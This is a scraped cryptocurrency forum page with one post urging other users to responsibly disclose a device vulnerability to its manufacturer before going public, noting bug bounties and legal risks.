▄███████████████▄▄▄▄▄
▄████████████████████▀░
▄█████████████████████▄░
▄█████████▀▀████████████▄
██████████████▀▀█████████
████████████████████████
██████████████▄▄█████████
▀█████████▄▄████████████▀
▀█████████████████████▀░
▀████████████████████▄░
▀███████████████▀▀▀▀▀
▀▀███████▀▀███████

▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
 
Playgram.io
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀

▄▄▄░░
▀▄







▄▀
▀▀▀░░
▄▄▄███████▄▄▄
▄▄███████████████▄▄
▄███████████████████▄
▄██████████████▀▀█████▄
▄██████████▀▀█████▐████▄
██████▀▀████▄▄▀▀█████████
████▄▄███▄██▀█████▐██████
█████████▀██████████████
▀███████▌▐██████▐██████▀
▀███████▄▄███▄████████▀
▀███████████████████▀
▀▀███████████████▀▀
▀▀▀███████▀▀▀
██████▄▄███████▄▄████████
███▄███████████████▄░░▀█▀
███████████░█████████░░
░█████▀██▄▄░▄▄██▀█████░
█████▄░▄███▄███▄░▄█████
███████████████████████
███████████████████████
██░▄▄▄░██░▄▄▄░██░▄▄▄░██
██░░░░██░░░░██░░░░████
██░░░░██░░░░██░░░░████
██▄▄▄▄▄██▄▄▄▄▄██▄▄▄▄▄████
███████████████████████
███████████████████████
 
PLAY NOW

on Telegram
[/
n0nce
Hero Member
*****
Offline Offline

Activity: 896
Merit: 5918


not your keys, not your coins!


View Profile WWW
March 26, 2022, 01:38:27 PM
Merited by Pmalek (1)
 #20

Depending on how severe this vulnerability or bug is, will the two of you reveal and discuss this with the manufacturing company first before releasing any details to the public? I think you should and I hope you will. There might be a bug bounty in it for you if you do. But more importantly, you won't be making life easier for those who want to destroy everything and steal money from people.   
It would also get them into big legal trouble if they don't make a responsible disclosure. In cybersecurity it's either that, or selling the exploit. Releasing online without notice to the manufacturer brings you 0 benefits and >0 troubles. Grin

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
Pages: [1] 2 3 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!